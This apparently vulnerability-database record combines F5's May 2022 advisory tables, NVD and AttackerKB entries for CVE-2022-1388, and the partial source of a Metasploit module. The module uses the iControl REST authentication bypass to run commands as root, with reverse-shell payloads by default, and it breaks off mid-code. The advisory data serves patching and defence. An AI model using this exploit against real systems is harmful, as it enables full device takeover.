16.1.2 | 17.0.0 \n16.1.2.2 \n[K41440465: BIG-IP TMM vulnerability CVE-2022-26071](<https://support.f5.com/csp/article/K41440465>) | 7.4 | BIG-IP (all modules) | 16.1.0 - 16.1.2 \n15.1.0 - 15.1.5 \n14.1.0 - 14.1.4 \n13.1.0 - 13.1.4 \n12.1.0 - 12.1.6 \n11.6.1 - 11.6.5 | 17.0.0 \n16.1.2.2 \n15.1.5.1 \n14.1.4.6 \n13.1.5 \n[K54460845: BIG-IP Edge Client for Windows vulnerability CVE-2022-28714](<https://support.f5.com/csp/article/K54460845>) | 7.3 | BIG-IP (APM) | 16.1.0 - 16.1.2 \n15.1.0 - 15.1.5 \n14.1.0 - 14.1.4 \n13.1.0 - 13.1.4 
\n12.1.0 - 12.1.6 \n11.6.1 - 11.6.5 | 17.0.0 \n16.1.2.2 \n15.1.5.1 \n14.1.4.6 \n13.1.5 \nBIG-IP APM Clients | 7.2.1 - 7.2.1 \n7.1.6 - 7.1.9 | 7.2.2 \n7.2.1.5 \n[K08510472: BIG-IP TMUI vulnerability CVE-2022-28695](<https://support.f5.com/csp/article/K08510472>) | 7.2 - Standard deployment mode | BIG-IP (AFM) | 16.1.0 - 16.1.2 \n15.1.0 - 15.1.5 \n14.1.0 - 14.1.4 \n13.1.0 - 13.1.4 | 17.0.0 \n16.1.2.2 \n15.1.5.1 \n14.1.4.6 \n13.1.5 \n9.1 - Appliance mode \n \n1F5 evaluates only software versions that have not yet reached the End of Technical Support (EoTS) phase of their lifecycle.\n\nMedium CVEs\n\nSecurity Advisory (CVE) | CVSS score | Affected products | Affected versions1 | Fixes introduced in \n---|---|---|---|--- \n[K92807525: TMUI XSS vulnerability CVE-2022-27878](<https://support.f5.com/csp/article/K92807525>) | 6.8 | BIG-IP Guided Configuration | 6.0 - 8.0 | 9.0 \nBIG-IP (all modules) | 16.0.0 - 16.1.2 \n15.1.0 - 15.1.5 \n14.1.0 - 14.1.4 \n13.1.0.4 - 13.1.5 | 17.0.0 \n[K94093538: NGINX Service Mesh control plane vulnerability CVE-2022-27495](<https://support.f5.com/csp/article/K94093538>) | 6.5 | NGINX Service Mesh | 1.3.0 - 1.3.1 | 1.4.0 \n[K57555833: BIG-IP APM vulnerability CVE-2022-27634](<https://support.f5.com/csp/article/K57555833>) | 6.5 | BIG-IP (APM) | 16.1.0 - 16.1.2 \n15.1.0 - 15.1.5 | 17.0.0 \n16.1.2.2 \n15.1.5.1 \n[K47662005: BIG-IP Net HSM script vulnerability CVE-2022-28859](<https://support.f5.com/csp/article/K47662005>) | 6.5 | BIG-IP (all modules) | 16.0.0 - 16.0.1 \n15.1.0 - 15.1.5 \n14.1.0 - 14.1.4 | 17.0.0 \n16.1.0 \n15.1.5.1 \n14.1.4.6 \n[K06323049: BIG-IP IPsec ALG vulnerability CVE-2022-29473](<https://support.f5.com/csp/article/K06323049>) | 5.9 | BIG-IP (all modules) | 15.1.0 - 15.1.5 \n14.1.0 - 14.1.4 \n13.1.0 - 13.1.4 | 16.1.0 \n15.1.5.1 \n14.1.4.5 \n13.1.5 \n[K51539421: BIG-IP SIP ALG profile vulnerability CVE-2022-26370](<https://support.f5.com/csp/article/K51539421>) | 5.9 | BIG-IP (all modules) | 16.1.0 - 16.1.2 \n15.1.0 - 
15.1.4 \n14.1.0 - 14.1.4 | 17.0.0 \n16.1.2.2 \n15.1.5 \n14.1.4.6 \n[K54082580: BIG-IP CGNAT LSN vulnerability CVE-2022-26517](<https://support.f5.com/csp/article/K54082580>) | 5.9 | BIG-IP (all modules) | 16.0.0 - 16.0.1 \n15.1.0 - 15.1.5 \n14.1.0 - 14.1.4 \n13.1.0 - 13.1.4 | 17.0.0 \n16.1.0 \n15.1.5.1 \n14.1.4.6 \n13.1.5 \n[K03755971: BIG-IP DNS resolver vulnerability CVE-2022-28706](<https://support.f5.com/csp/article/K03755971>) | 5.9 | BIG-IP (all modules) | 16.0.0 - 16.1.1 \n15.1.0 - 15.1.5 | 17.0.0 \n16.1.2 \n15.1.5.1 \n[K85054496: BIG-IP DNS resolver vulnerability CVE-2022-28708](<https://support.f5.com/csp/article/K85054496>) | 5.9 | BIG-IP (all modules) | 16.1.0 - 16.1.2 \n15.1.0 - 15.1.5 | 17.0.0 \n16.1.2.2 \n15.1.5.1 \n[K40019131: F5 Access for Android vulnerability CVE-2022-27875](<https://support.f5.com/csp/article/K40019131>) | 5.5 | F5 Access for Android | 3.0.6 - 3.0.7 | 3.0.8 \n[K57110035: BIG-IP APM Edge client for Windows logging vulnerability CVE-2022-27636](<https://support.f5.com/csp/article/K57110035>) | 5.5 | BIG-IP (APM) | 16.1.0 - 16.1.2 \n15.1.0 - 15.1.5 \n14.1.0 - 14.1.4 \n13.1.0 - 13.1.4 \n12.1.0 - 12.1.6 \n11.6.1 - 11.6.5 | 17.0.0 \n16.1.2.2 \n15.1.5.1 \n14.1.4.6 \n13.1.5 \nBIG-IP APM Clients | 7.1.6 - 7.2.1 | 7.2.1.5 \n[K44233515: F5OS-A vulnerability CVE-2022-25990](<https://support.f5.com/csp/article/K44233515>) | 5.3 | F5OS-A | 1.0.0 | 1.0.1 \n[K82034427: BIG-IP FTP profile vulnerability CVE-2022-26130](<https://support.f5.com/csp/article/K82034427>) | 5.3 | BIG-IP (all modules) | 16.1.0 - 16.1.2 \n15.1.0 - 15.1.5 \n14.1.0 - 14.1.4 \n13.1.0 - 13.1.4 | 17.0.0 \n16.1.2.2 \n15.1.5.1 \n14.1.4.6 \n13.1.5 \n[K71103363: BIG-IP big3d vulnerability CVE-2022-29480](<https://support.f5.com/csp/article/K71103363>) | 5.3 | BIG-IP (all modules) | 13.1.0 - 13.1.4 \n12.1.0 - 12.1.6 \n11.6.1 - 11.6.5 | 14.0.0 \n13.1.5 \n[K64124988: TMM IPv6 stack vulnerability CVE-2022-29479](<https://support.f5.com/csp/article/K64124988>) | 5.3 | BIG-IP (all 
modules) | 16.0.0 - 16.0.1 \n15.1.0 - 15.1.5 \n14.1.0 - 14.1.4 \n13.1.0 - 13.1.4 \n12.1.0 - 12.1.6 \n11.6.1 - 11.6.5 | 17.0.0 \n16.1.0 \n15.1.5.1 \n14.1.4.6 \n13.1.5 \nBIG-IQ Centralized Management | 8.0.0 - 8.2.0 \n7.0.0 - 7.1.0 | None \n[K31856317: BIG-IP Packet Filters vulnerability CVE-2022-27182](<https://support.f5.com/csp/article/K31856317>) | 5.3 | BIG-IP (all modules) | 16.1.0 - 16.1.2 \n15.1.0 - 15.1.5 \n14.1.0 - 14.1.4 | 17.0.0 \n16.1.2.2 \n15.1.5.1 \n14.1.4.6 \n[K93543114: BIG-IP APM vulnerability CVE-2022-27181](<https://support.f5.com/csp/article/K93543114>) | 5.3 | BIG-IP (APM) | 16.1.0 - 16.1.2 \n15.1.0 - 15.1.5 \n14.1.0 - 14.1.4 \n13.1.0 - 13.1.4 \n12.1.0 - 12.1.6 \n11.6.1 - 11.6.5 | 17.0.0 \n16.1.2.2 \n15.1.5.1 \n14.1.4.6 \n13.1.5 \n[K53197140: BIG-IP iControl REST and tmsh vulnerabilities CVE-2022-26835](<https://support.f5.com/csp/article/K53197140>) | 4.9 - Standard deployment mode | BIG-IP (all modules) | 16.1.0 - 16.1.2 \n15.1.0 - 15.1.5 \n14.1.0 - 14.1.4 \n13.1.0 - 13.1.4 \n12.1.0 - 12.1.6 \n11.6.1 - 11.6.5 | 17.0.0 \n16.1.2.2 \n15.1.5.1 \n14.1.4.6 \n13.1.5 \n6.8 - Appliance mode \n[K38271531: BIG-IP and BIG-IQ SCP vulnerability CVE-2022-26340](<https://support.f5.com/csp/article/K38271531>) | 4.9 | BIG-IP (all modules) | 16.0.0 - 16.1.2 \n15.1.0 - 15.1.5 \n14.1.0 - 14.1.4 \n13.1.0 - 13.1.4 \n12.1.0 - 12.1.6 \n11.6.1 - 11.6.5 | 17.0.0 \n16.1.2.2 \n15.1.5.1 \n14.1.4.6 \n13.1.5 \nBIG-IQ Centralized Management | 8.0.0 - 8.2.0 \n7.0.0 - 7.1.0 | None \n[K24248011: Traffix SDC Configuration utility vulnerability CVE-2022-27662](<https://support.f5.com/csp/article/K24248011>) | 4.8 | Traffix SDC | 5.2.0 \n5.1.0 | 5.2.2 \n5.1.35 \n[K17341495: Traffix SDC Configuration utility vulnerability CVE-2022-27880](<https://support.f5.com/csp/article/K17341495>) | 4.8 | Traffix SDC | 5.2.0 \n5.1.0 | 5.2.2 \n5.1.35 \n[K15101402: iControl REST vulnerability CVE-2022-1468](<https://support.f5.com/csp/article/K15101402>) | 4.3 | BIG-IP (all modules) | 17.0.0 
\n16.1.0 - 16.1.2 \n15.1.0 - 15.1.5 \n14.1.0 - 14.1.4 \n13.1.0 - 13.1.5 \n12.1.0 - 12.1.6 \n11.6.1 - 11.6.5 | None \n[K41877405: BIG-IP TMUI vulnerability CVE-2022-27659](<https://support.f5.com/csp/article/K41877405>) | 4.3 | BIG-IP (all modules) | 16.1.0 - 16.1.2 \n15.1.0 - 15.1.5 \n14.1.0 - 14.1.4 | 17.0.0 \n16.1.2.2 \n15.1.5.1 \n14.1.4.6 \n[K59904248: iControl SOAP vulnerability CVE-2022-29474](<https://support.f5.com/csp/article/K59904248>) | 4.3 | BIG-IP (all modules) | 16.1.0 - 16.1.2 \n15.1.0 - 15.1.5 \n14.1.0 - 14.1.4 \n13.1.0 - 13.1.4 \n12.1.0 - 12.1.6 \n11.6.1 - 11.6.5 | 17.0.0 \n16.1.2.2 \n15.1.5.1 \n14.1.4.6 \n13.1.5 \n \n1F5 evaluates only software versions that have not yet reached the End of Technical Support (EoTS) phase of their lifecycle.\n\nLow CVEs\n\nSecurity Advisory (CVE) | CVSS score | Affected products | Affected versions1 | Fixes introduced in \n---|---|---|---|--- \n[K49905324: BIG-IP TMUI CSRF vulnerability CVE-2022-1389](<https://support.f5.com/csp/article/K49905324>) | 3.1 | BIG-IP (all modules) | 16.1.0 - 16.1.2 \n15.1.0 - 15.1.5 \n14.1.0 - 14.1.4 \n13.1.0 - 13.1.5 \n12.1.0 - 12.1.6 \n11.6.1 - 11.6.5 | 17.0.0 \n \n1F5 evaluates only software versions that have not yet reached the End of Technical Support (EoTS) phase of their lifecycle.\n\nSecurity Exposures\n\nSecurity Advisory (Exposure) | Affected products | Affected versions1 | Fixes introduced in \n---|---|---|--- \n[K68816502: A BIG-IP LTM policy referencing an external data group may not match traffic](<https://support.f5.com/csp/article/K68816502>) | BIG-IP (all modules) | 16.1.0 - 16.1.2 \n15.1.0 - 15.1.5 \n14.1.0 - 14.1.4 \n13.1.0 - 13.1.5 \n12.1.0 - 12.1.6 \n11.6.1 - 11.6.5 | 17.0.0 \n16.1.2.2 \n15.1.5.1 \n14.1.4.6 \n[K74302282: BIG-IP APM RDP resource security exposure](<https://support.f5.com/csp/article/K74302282>) | BIG-IP (APM) | 16.1.0 - 16.1.2 \n15.1.0 - 15.1.5 \n14.1.0 - 14.1.4 \n13.1.0 - 13.1.4 \n12.1.0 - 12.1.6 \n11.6.1 - 11.6.5 | 17.0.0 \n16.1.2.2 \n15.1.5.1 
\n14.1.4.6 \n13.1.5 \n[K70134152: BIG-IP ASM, F5 Advanced WAF, and NGINX App Protect encoded directory traversal security exposure](<https://support.f5.com/csp/article/K70134152>) | BIG-IP (Advanced WAF, ASM) | 16.1.0 \n15.1.0 - 15.1.3 \n14.1.0 - 14.1.4 \n13.1.0 - 13.1.4 \n12.1.0 - 12.1.6 \n11.6.1 - 11.6.5 | 17.0.0 \n16.1.1 \n15.1.4 \n14.1.4.4 \n13.1.5 \nNGINX App Protect | 3.0.0 - 3.6.0 \n2.0.0 - 2.3.0 \n1.0.0 - 1.3.0 | 3.7.0 \n[K80945213: BIG-IP ASM and F5 Advanced WAF attack signature check failure security exposure](<https://support.f5.com/csp/article/K80945213>) | BIG-IP (Advanced WAF, ASM) | 15.1.0 - 15.1.4 \n14.1.0 - 14.1.4 \n13.1.0 - 13.1.4 \n12.1.0 - 12.1.6 \n11.6.1 - 11.6.5 | 16.1.0 \n15.1.4.1 \n14.1.4.4 \n13.1.5 \n[K67397230: BIG-IP ASM, F5 Advanced WAF, and NGINX App Protect normalizing security exposure](<https://support.f5.com/csp/article/K67397230>) | BIG-IP (Advanced WAF, ASM) | 16.1.0 - 16.1.2 \n15.1.0 - 15.1.4 \n14.1.0 - 14.1.4 | 17.0.0 \n16.1.2.1 \n15.1.5 \n14.1.4.6 \nNGINX App Protect | 3.0.0 - 3.6.0 \n2.0.0 - 2.3.0 \n1.0.0 - 1.3.0 | 3.7.0 \n[K53593534: BIG-IP ASM and F5 Advanced WAF attack signature check failure on certain HTTP requests](<https://support.f5.com/csp/article/K53593534>) | BIG-IP (Advanced WAF, ASM) | 16.1.0 - 16.1.2 \n15.1.0 - 15.1.5 \n14.1.0 - 14.1.4 \n13.1.0 - 13.1.4 \n12.1.0 - 12.1.6 \n11.6.1 - 11.6.5 | 17.0.0 \n16.1.2.2 \n15.1.5.1 \n14.1.4.6 \n13.1.5 \n[K39002226: F5 Advanced WAF and BIG-IP ASM multipart request security exposure](<https://support.f5.com/csp/article/K39002226>) | BIG-IP (Advanced WAF, ASM) | 16.1.0 - 16.1.2 \n15.1.0 - 15.1.5 \n14.1.0 - 14.1.4 \n13.1.0 - 13.1.4 \n12.1.0 - 12.1.6 \n11.6.1 - 11.6.5 | 17.0.0 \n16.1.2.2 \n15.1.5.1 \n14.1.4.6 \n13.1.5 \n[K94142349: BIG-IP Advanced WAF and ASM WebSocket security exposure](<https://support.f5.com/csp/article/K94142349>) | BIG-IP (Advanced WAF, ASM) | 16.1.0 - 16.1.2 \n15.1.0 - 15.1.5 \n14.1.0 - 14.1.4 \n13.1.0 - 13.1.4 \n12.1.0 - 12.1.6 | 17.0.0 \n16.1.2.2 
\n15.1.5.1 \n14.1.4.6 \n13.1.5 \n[K85021277: BIG-IP DNSSEC security exposure](<https://support.f5.com/csp/article/K85021277>) | BIG-IP (DNS) | 16.1.0 - 16.1.2 \n15.1.0 - 15.1.5 \n14.1.0 - 14.1.4 \n13.1.0 - 13.1.4 \n12.1.0 - 12.1.6 \n11.6.1 - 11.6.5 | 17.0.0 \n16.1.2.2 \n15.1.5.1 \n14.1.4.6 \n13.1.5 \n[K92306170: BIG-IP AFM single endpoint flood/sweep DoS vector security exposure ](<https://support.f5.com/csp/article/K92306170>) | BIG-IP (AFM) | 16.1.0 - 16.1.2 \n15.1.0 - 15.1.5 \n14.1.0 - 14.1.4 | 17.0.0 \n16.1.2.2 \n15.1.5.1 \n14.1.4.6 \n \n1F5 evaluates only software versions that have not yet reached the End of Technical Support (EoTS) phase of their lifecycle.\n", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 9.8, "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", "version": "3.1", "userInteraction": "NONE"}, "impactScore": 5.9}, "published": "2022-05-04T13:13:00", "type": "f5", "title": "Overview of F5 vulnerabilities (May 2022)", "bulletinFamily": "software", "cvss2": {"severity": "HIGH", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "PARTIAL", "availabilityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "baseScore": 7.5, "vectorString": "AV:N/AC:L/Au:N/C:P/I:P/A:P", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 6.4, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2022-1388", "CVE-2022-1389", "CVE-2022-1468", "CVE-2022-25946", "CVE-2022-25990", "CVE-2022-26071", "CVE-2022-26130", "CVE-2022-26340", "CVE-2022-26370", "CVE-2022-26372", "CVE-2022-26415", "CVE-2022-26517", "CVE-2022-26835", "CVE-2022-26890", 
"CVE-2022-27181", "CVE-2022-27182", "CVE-2022-27189", "CVE-2022-27230", "CVE-2022-27495", "CVE-2022-27634", "CVE-2022-27636", "CVE-2022-27659", "CVE-2022-27662", "CVE-2022-27806", "CVE-2022-27875", "CVE-2022-27878", "CVE-2022-27880", "CVE-2022-28691", "CVE-2022-28695", "CVE-2022-28701", "CVE-2022-28705", "CVE-2022-28706", "CVE-2022-28707", "CVE-2022-28708", "CVE-2022-28714", "CVE-2022-28716", "CVE-2022-28859", "CVE-2022-29263", "CVE-2022-29473", "CVE-2022-29474", "CVE-2022-29479", "CVE-2022-29480", "CVE-2022-29491"], "modified": "2022-05-04T13:13:00", "id": "F5:K55879220", "href": "https://support.f5.com/csp/article/K55879220", "cvss": {"score": 7.5, "vector": "AV:N/AC:L/Au:N/C:P/I:P/A:P"}}], "attackerkb": [{"lastseen": "2022-06-03T22:56:47", "description": "On F5 BIG-IP 16.1.x versions prior to 16.1.2.2, 15.1.x versions prior to 15.1.5.1, 14.1.x versions prior to 14.1.4.6, 13.1.x versions prior to 13.1.5, and all 12.1.x and 11.6.x versions, undisclosed requests may bypass iControl REST authentication. Note: Software versions which have reached End of Technical Support (EoTS) are not evaluated\n\n \n**Recent assessments:** \n \n**rbowes-r7** at May 10, 2022 9:02pm UTC reported:\n\nThe patch was difficult to analyze, due to the sheer amount of code and changes. But once Horizon3 released a PoC, tracking down the root cause and analyzing what\u2019s going on was much easier. Cheers!\n\n**carlosevieira** at May 05, 2022 8:36pm UTC reported:\n\nThe patch was difficult to analyze, due to the sheer amount of code and changes. But once Horizon3 released a PoC, tracking down the root cause and analyzing what\u2019s going on was much easier. 
Cheers!\n\nAssessed Attacker Value: 5 \nAssessed Attacker Value: 5Assessed Attacker Value: 5\n", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 9.8, "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", "version": "3.1", "userInteraction": "NONE"}, "impactScore": 5.9}, "published": "2022-05-04T00:00:00", "type": "attackerkb", "title": "CVE-2022-1388", "bulletinFamily": "info", "cvss2": {"severity": "HIGH", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "PARTIAL", "availabilityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "baseScore": 7.5, "vectorString": "AV:N/AC:L/Au:N/C:P/I:P/A:P", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 6.4, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2022-1388"], "modified": "2022-05-10T00:00:00", "id": "AKB:84F3B5A8-D839-4F1A-9130-A0C5D4B74057", "href": "https://attackerkb.com/topics/SN5WCzYO7W/cve-2022-1388", "cvss": {"score": 7.5, "vector": "AV:N/AC:L/Au:N/C:P/I:P/A:P"}}], "cve": [{"lastseen": "2022-05-13T00:01:49", "description": "On F5 BIG-IP 16.1.x versions prior to 16.1.2.2, 15.1.x versions prior to 15.1.5.1, 14.1.x versions prior to 14.1.4.6, 13.1.x versions prior to 13.1.5, and all 12.1.x and 11.6.x versions, undisclosed requests may bypass iControl REST authentication. 
Note: Software versions which have reached End of Technical Support (EoTS) are not evaluated", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 9.8, "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", "version": "3.1", "userInteraction": "NONE"}, "impactScore": 5.9}, "published": "2022-05-05T17:15:00", "type": "cve", "title": "CVE-2022-1388", "cwe": ["CWE-306"], "bulletinFamily": "NVD", "cvss2": {"severity": "HIGH", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "PARTIAL", "availabilityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "baseScore": 7.5, "vectorString": "AV:N/AC:L/Au:N/C:P/I:P/A:P", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 6.4, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2022-1388"], "modified": "2022-05-12T18:16:00", "cpe": ["cpe:/a:f5:big-ip_advanced_firewall_manager:12.1.6", "cpe:/a:f5:big-ip_access_policy_manager:11.6.5", "cpe:/a:f5:big-ip_fraud_protection_service:11.6.5", "cpe:/a:f5:big-ip_local_traffic_manager:11.6.5", "cpe:/a:f5:big-ip_access_policy_manager:12.1.6", "cpe:/a:f5:big-ip_analytics:12.1.6", "cpe:/a:f5:big-ip_application_acceleration_manager:12.1.6", "cpe:/a:f5:big-ip_link_controller:12.1.6", "cpe:/a:f5:big-ip_application_security_manager:12.1.6", "cpe:/a:f5:big-ip_link_controller:11.6.5", "cpe:/a:f5:big-ip_policy_enforcement_manager:11.6.5", "cpe:/a:f5:big-ip_application_security_manager:11.6.5", "cpe:/a:f5:big-ip_policy_enforcement_manager:12.1.6", "cpe:/a:f5:big-ip_domain_name_system:11.6.5", "cpe:/a:f5:big-ip_global_traffic_manager:12.1.6", "cpe:/a:f5:big-ip_analytics:11.6.5", 
"cpe:/a:f5:big-ip_advanced_firewall_manager:11.6.5", "cpe:/a:f5:big-ip_global_traffic_manager:11.6.5", "cpe:/a:f5:big-ip_domain_name_system:12.1.6", "cpe:/a:f5:big-ip_application_acceleration_manager:11.6.5", "cpe:/a:f5:big-ip_fraud_protection_service:12.1.6", "cpe:/a:f5:big-ip_local_traffic_manager:12.1.6"], "id": "CVE-2022-1388", "href": "https://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2022-1388", "cvss": {"score": 7.5, "vector": "AV:N/AC:L/Au:N/C:P/I:P/A:P"}, "cpe23": ["cpe:2.3:a:f5:big-ip_application_security_manager:11.6.5:*:*:*:*:*:*:*", "cpe:2.3:a:f5:big-ip_policy_enforcement_manager:12.1.6:*:*:*:*:*:*:*", "cpe:2.3:a:f5:big-ip_application_acceleration_manager:12.1.6:*:*:*:*:*:*:*", "cpe:2.3:a:f5:big-ip_local_traffic_manager:11.6.5:*:*:*:*:*:*:*", "cpe:2.3:a:f5:big-ip_local_traffic_manager:12.1.6:*:*:*:*:*:*:*", "cpe:2.3:a:f5:big-ip_application_security_manager:12.1.6:*:*:*:*:*:*:*", "cpe:2.3:a:f5:big-ip_fraud_protection_service:11.6.5:*:*:*:*:*:*:*", "cpe:2.3:a:f5:big-ip_advanced_firewall_manager:12.1.6:*:*:*:*:*:*:*", "cpe:2.3:a:f5:big-ip_domain_name_system:11.6.5:*:*:*:*:*:*:*", "cpe:2.3:a:f5:big-ip_application_acceleration_manager:11.6.5:*:*:*:*:*:*:*", "cpe:2.3:a:f5:big-ip_domain_name_system:12.1.6:*:*:*:*:*:*:*", "cpe:2.3:a:f5:big-ip_analytics:11.6.5:*:*:*:*:*:*:*", "cpe:2.3:a:f5:big-ip_link_controller:12.1.6:*:*:*:*:*:*:*", "cpe:2.3:a:f5:big-ip_advanced_firewall_manager:11.6.5:*:*:*:*:*:*:*", "cpe:2.3:a:f5:big-ip_policy_enforcement_manager:11.6.5:*:*:*:*:*:*:*", "cpe:2.3:a:f5:big-ip_global_traffic_manager:12.1.6:*:*:*:*:*:*:*", "cpe:2.3:a:f5:big-ip_fraud_protection_service:12.1.6:*:*:*:*:*:*:*", "cpe:2.3:a:f5:big-ip_analytics:12.1.6:*:*:*:*:*:*:*", "cpe:2.3:a:f5:big-ip_global_traffic_manager:11.6.5:*:*:*:*:*:*:*", "cpe:2.3:a:f5:big-ip_access_policy_manager:11.6.5:*:*:*:*:*:*:*", "cpe:2.3:a:f5:big-ip_access_policy_manager:12.1.6:*:*:*:*:*:*:*", "cpe:2.3:a:f5:big-ip_link_controller:11.6.5:*:*:*:*:*:*:*"]}], "metasploit": [{"lastseen": 
"2022-06-24T08:36:36", "description": "This module exploits an authentication bypass vulnerability in the F5 BIG-IP iControl REST service to gain access to the admin account, which is capable of executing commands through the /mgmt/tm/util/bash endpoint. Successful exploitation results in remote code execution as the root user.\n", "cvss3": {}, "published": "2022-05-11T21:43:00", "type": "metasploit", "title": "F5 BIG-IP iControl RCE via REST Authentication Bypass", "bulletinFamily": "exploit", "cvss2": {}, "cvelist": ["CVE-2022-1388"], "modified": "2022-05-11T21:43:37", "id": "MSF:EXPLOIT-LINUX-HTTP-F5_ICONTROL_RCE-", "href": "https://www.rapid7.com/db/modules/exploit/linux/http/f5_icontrol_rce/", "sourceData": "##\n# This module requires Metasploit: https://metasploit.com/download\n# Current source: https://github.com/rapid7/metasploit-framework\n##\n\nclass MetasploitModule < Msf::Exploit::Remote\n Rank = ExcellentRanking\n\n include Msf::Exploit::Remote::HttpClient\n include Msf::Exploit::CmdStager\n prepend Msf::Exploit::Remote::AutoCheck\n\n def initialize(info = {})\n super(\n update_info(\n info,\n 'Name' => 'F5 BIG-IP iControl RCE via REST Authentication Bypass',\n 'Description' => %q{\n This module exploits an authentication bypass vulnerability\n in the F5 BIG-IP iControl REST service to gain access to the\n admin account, which is capable of executing commands\n through the /mgmt/tm/util/bash endpoint.\n\n Successful exploitation results in remote code execution\n as the root user.\n },\n 'Author' => [\n 'Heyder Andrade', # Metasploit module\n 'alt3kx <alt3kx[at]protonmail.com>', # PoC\n 'James Horseman', # Technical Writeup\n 'Ron Bowes' # Documentation of exploitation specifics\n ],\n 'References' => [\n ['CVE', '2022-1388'],\n ['URL', 'https://support.f5.com/csp/article/K23605346'],\n ['URL', 'https://www.horizon3.ai/f5-icontrol-rest-endpoint-authentication-bypass-technical-deep-dive/'], # Writeup\n ['URL', 
'https://github.com/alt3kx/CVE-2022-1388_PoC'] # PoC\n ],\n 'License' => MSF_LICENSE,\n 'DisclosureDate' => '2022-05-04', # Vendor advisory\n 'Platform' => ['unix', 'linux'],\n 'Arch' => [ARCH_CMD, ARCH_X86, ARCH_X64],\n 'Privileged' => true,\n 'Targets' => [\n [\n 'Unix Command',\n {\n 'Platform' => 'unix',\n 'Arch' => ARCH_CMD,\n 'Type' => :unix_cmd,\n 'DefaultOptions' => {\n 'PAYLOAD' => 'cmd/unix/python/meterpreter/reverse_tcp'\n }\n }\n ],\n [\n 'Linux Dropper',\n {\n 'Platform' => 'linux',\n 'Arch' => [ARCH_X86, ARCH_X64],\n 'Type' => :linux_dropper,\n 'DefaultOptions' => {\n 'CMDSTAGER::FLAVOR' => :bourne,\n 'PAYLOAD' => 'linux/x64/meterpreter/reverse_tcp'\n }\n }\n ]\n ],\n 'DefaultTarget' => 1, # Linux Dropper avoids some timeout issues that Unix Command payloads sometimes encounter.\n 'DefaultOptions' => {\n 'RPORT' => 443,\n 'SSL' => true,\n 'PrependFork' => true, # Needed to avoid warnings about timeouts and potential failures across attempts.\n 'MeterpreterTryToFork' => true # Needed to avoid warnings about timeouts and potential failures across attempts.\n },\n 'Notes' => {\n 'Stability' => [CRASH_SAFE],\n 'Reliability' => [REPEATABLE_SESSION], # Only one concurrent session\n 'SideEffects' => [\n IOC_IN_LOGS, # /var/log/restjavad.0.log (rotated)\n ARTIFACTS_ON_DISK # CmdStager\n ]\n }\n )\n )\n\n register_options(\n [\n OptString.new('TARGETURI', [true, 'The base path to the iControl installation', '/']),\n OptString.new('HttpUsername', [true, 'iControl username', 'admin']),\n OptString.new('HttpPassword', [true, 'iControl password', ''])\n ]\n )\n register_advanced_options([\n OptFloat.new('CmdExecTimeout', [true, 'Command execution timeout', 3.5])\n ])\n end\n\n def check\n print_status(\"Checking #{datastore['RHOST']}:#{datastore['RPORT']}\")\n res = send_request_cgi({\n 'uri' => normalize_uri(target_uri.path, '/mgmt/shared/authn/login'),\n 'method' => 'GET'\n })\n\n return CheckCode::Unknown unless res&.code == 401\n\n body = 
res.get_json_document\n\n return CheckCode::Safe unless body.key?('message') && body['kind'] == ':resterrorresponse'\n\n signature = Rex::Text.rand_text_alpha(13)\n stub = \"echo #{signature}\"\n res = send_command(stub)\n return CheckCode::Safe unless res&.code == 200\n\n body = res.get_json_document\n\n return CheckCode::Safe unless body['kind'] == 'tm:util:bash:runstate'\n\n return CheckCode::Vulnerable if body['commandResult'].chomp == signature\n\n CheckCode::Safe\n end\n\n def exploit\n print_status(\"Executing #{target.name} for #{datastore['PAYLOAD']}\")\n\n case target['Type']\n when :unix_cmd\n execute_command(payload.encoded)\n when :linux_dropper\n execute_cmdstager\n end\n end\n\n def execute_command(cmd, _opts = {})\n vprint_status(\"Executing command: #{cmd}\")\n\n res = send_command(cmd)\n unless res\n print_warning('Command execution timed out')\n return\n end\n\n json = res.get_json_document\n\n unless res.code == 200 && json['kind'] == 'tm:util:bash:runstate'\n fail_with(Failure::PayloadFailed, 'Failed to execute command')\n end\n\n print_good('Successfully executed command')\n\n return unless (cmd_result = json['commandResult'])\n\n vprint_line(cmd_result)\n end\n\n def send_command(cmd)\n bash_cmd = \"eval $(echo #{Rex::Text.encode_base64(cmd)} | base64 -d)\"\n send_request_cgi({\n 'method' => 'POST',\n 'uri' => normalize_uri(target_uri.path, 